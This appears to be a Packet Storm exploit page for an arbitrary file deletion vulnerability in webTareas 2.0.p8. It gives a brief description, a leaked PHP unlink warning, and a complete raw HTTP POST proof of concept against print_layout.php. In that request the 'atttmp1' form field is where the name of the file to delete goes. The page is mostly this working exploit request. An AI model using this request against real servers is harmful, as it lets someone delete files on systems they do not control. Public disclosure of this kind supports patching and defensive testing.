exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

webTareas 2.0.p8 Arbitrary File Deletion

webTareas 2.0.p8 Arbitrary File Deletion
Posted May 6, 2020
Authored by Besim Altinok, Ismail Bozkurt

webTareas version 2.0.p8 suffers from an arbitrary file deletion vulnerability.

tags | exploit, arbitrary
SHA-256 | 53feab1c01610ac9766079cc3e61e4a14571a15e61dcb409c67594187299d4f8

webTareas 2.0.p8 Arbitrary File Deletion

Change Mirror Download
# Exploit Title: webTareas 2.0.p8 - Arbitrary File Deletion
# Date: 2020-05-02
# Author: Besim ALTINOK
# Vendor Homepage: https://sourceforge.net/projects/webtareas/files/
# Software Link: https://sourceforge.net/projects/webtareas/files/
# Version: v2.0.p8
# Tested on: Xampp
# Credit: İsmail BOZKURT


Description:
--------------------------------------------------------------------------------------

- print_layout.php is vulnerable. When you sent PoC code to the server and
If there is no file on the server, you can see, this error message

<br />
<b>Warning</b>:
unlink(/Applications/XAMPP/xamppfiles/htdocs/webtareas/files/PrintLayouts/tester.png.php--1.zip):
No such file or directory in
<b>/Applications/XAMPP/xamppfiles/htdocs/webtareas/includes/library.php</b>
on line <b>1303</b><br />

- So, Here, you can delete file with unlink function.
- And, I ddi try again with another file, I deleted from the server.
--------------------------------------------------------------------------------------------

Arbitrary File Deletion PoC
---------------------------------------------------------------------------------------

POST
/webtareas/administration/print_layout.php?doc_type=11&doc_type_ex=&id=1&mode=edit&borne1=0
HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 ***********************
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://localhost/webtareas/administration/print_layout.php?doc_type=11&doc_type_ex=&mode=edit&borne1=0&id=1
Content-Type: multipart/form-data;
boundary=---------------------------3678767312987982041084647942
Content-Length: 882
DNT: 1
Connection: close
Cookie: webTareasSID=4b6a4799c9e7906a06c574dc48ffb730;
PHPSESSIDwebERPteam=9b2b068ea2de93ed1ee0aafe27818191
Upgrade-Insecure-Requests: 1

-----------------------------3678767312987982041084647942
Content-Disposition: form-data; name="action"

edit
-----------------------------3678767312987982041084647942
Content-Disposition: form-data; name="desc"

<p>tester</p>
-----------------------------3678767312987982041084647942
Content-Disposition: form-data; name="file1"; filename=""
Content-Type: application/octet-stream


-----------------------------3678767312987982041084647942
Content-Disposition: form-data; name="attnam1"


-----------------------------3678767312987982041084647942
Content-Disposition: form-data; name="atttmp1"

--add the delete file name here--
-----------------------------3678767312987982041084647942
Content-Disposition: form-data; name="sp"


-----------------------------3678767312987982041084647942--
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close